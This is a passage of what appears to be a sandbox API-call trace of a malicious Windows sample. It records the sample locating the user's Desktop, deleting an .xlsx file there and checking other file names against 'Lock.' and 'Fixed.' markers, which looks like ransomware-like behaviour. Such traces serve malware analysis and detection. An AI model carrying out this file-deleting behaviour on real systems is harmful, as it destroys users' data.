out: hHeap=0x25c0000) returned 1 [0187.872] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lorGIZR7_Ai6fNrX6f.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lorgizr7_ai6fnrx6f.xlsx")) returned 0x20 [0187.872] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lorGIZR7_Ai6fNrX6f.xlsx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b13d2b0, ftCreationTime.dwHighDateTime=0x1d4c6a9, ftLastAccessTime.dwLowDateTime=0xacf087c0, ftLastAccessTime.dwHighDateTime=0x1d4d361, ftLastWriteTime.dwLowDateTime=0xacf087c0, ftLastWriteTime.dwHighDateTime=0x1d4d361, nFileSizeHigh=0x0, nFileSizeLow=0x58b8, dwReserved0=0x5d, dwReserved1=0x4, cFileName="lorGIZR7_Ai6fNrX6f.xlsx", cAlternateFileName="LORGIZ~1.XLS")) returned 0xaa5820 [0187.872] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lorGIZR7_Ai6fNrX6f.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lorgizr7_ai6fnrx6f.xlsx")) returned 1 [0187.875] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b13d2b0, ftCreationTime.dwHighDateTime=0x1d4c6a9, ftLastAccessTime.dwLowDateTime=0xacf087c0, ftLastAccessTime.dwHighDateTime=0x1d4d361, ftLastWriteTime.dwLowDateTime=0xacf087c0, ftLastWriteTime.dwHighDateTime=0x1d4d361, nFileSizeHigh=0x0, nFileSizeLow=0x58b8, dwReserved0=0x5d, dwReserved1=0x4, cFileName="lorGIZR7_Ai6fNrX6f.xlsx", cAlternateFileName="LORGIZ~1.XLS")) returned 0 [0187.875] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0187.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0187.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0187.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0187.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0187.876] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0187.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x2416f30 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0187.876] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0187.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9678 [0187.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0187.877] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf440 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0187.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0187.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0187.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0187.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0187.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0187.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0187.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0187.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0187.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0187.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0187.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0187.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0187.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0187.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0187.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0187.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0187.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0187.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0187.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0187.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0187.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0187.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0187.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0187.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0187.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0187.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0187.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0187.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0187.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0187.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0187.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0187.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0187.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0187.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x7c) returned 0x24202f0 [0187.879] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/lorGIZR7_Ai6fNrX6f.xlsx", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lorGIZR7_Ai6fNrX6f.xlsx", lpFilePart=0x8bf658*="lorGIZR7_Ai6fNrX6f.xlsx") returned 0x3d [0187.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0187.879] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\lorGIZR7_Ai6fNrX6f.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\lorgizr7_ai6fnrx6f.xlsx")) returned 0xffffffff [0187.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0187.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0187.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0187.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0187.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0187.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0187.879] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0187.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0187.879] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0187.879] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0187.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0187.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0187.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0187.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0187.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0187.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0187.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0187.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0187.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0187.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0187.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0187.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0187.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="md6gSAuODLhq.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d6gSAuODLhq.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6gSAuODLhq.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gSAuODLhq.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SAuODLhq.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AuODLhq.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uODLhq.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODLhq.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLhq.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lhq.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hq.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0187.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q.avi", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0187.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0187.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0187.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0187.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0187.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0187.881] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0187.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0187.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0187.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0187.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0187.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0187.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="md6gSAuODLhq.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d6gSAuODLhq.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0187.881] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6gSAuODLhq.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0187.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gSAuODLhq.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SAuODLhq.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AuODLhq.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0187.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uODLhq.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ODLhq.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLhq.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0187.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lhq.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hq.avi", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0187.882] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0187.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0187.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0187.882] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0187.882] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0187.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0187.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0187.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9af8 [0187.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0187.882] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0187.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0187.883] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0187.883] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0187.883] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0187.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0187.883] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0187.884] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.884] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0187.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0187.884] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0187.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0187.884] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0187.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0187.884] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0187.884] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0187.884] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/md6gSAuODLhq.avi", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9caadd70, ftCreationTime.dwHighDateTime=0x1d4c5ab, ftLastAccessTime.dwLowDateTime=0x48e7a230, ftLastAccessTime.dwHighDateTime=0x1d4d191, ftLastWriteTime.dwLowDateTime=0x48e7a230, ftLastWriteTime.dwHighDateTime=0x1d4d191, nFileSizeHigh=0x0, nFileSizeLow=0x7acb, dwReserved0=0xc170006, dwReserved1=0xee03, cFileName="md6gSAuODLhq.avi", cAlternateFileName="MD6GSA~1.AVI")) returned 0xaa5820 [0187.884] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0187.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0187.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0187.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0187.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0187.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0187.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0187.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0187.885] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0187.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0187.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0187.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0187.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0187.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0187.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0187.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0187.885] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0187.885] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0187.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0187.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0187.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0187.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0187.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0187.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0187.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0187.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0187.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 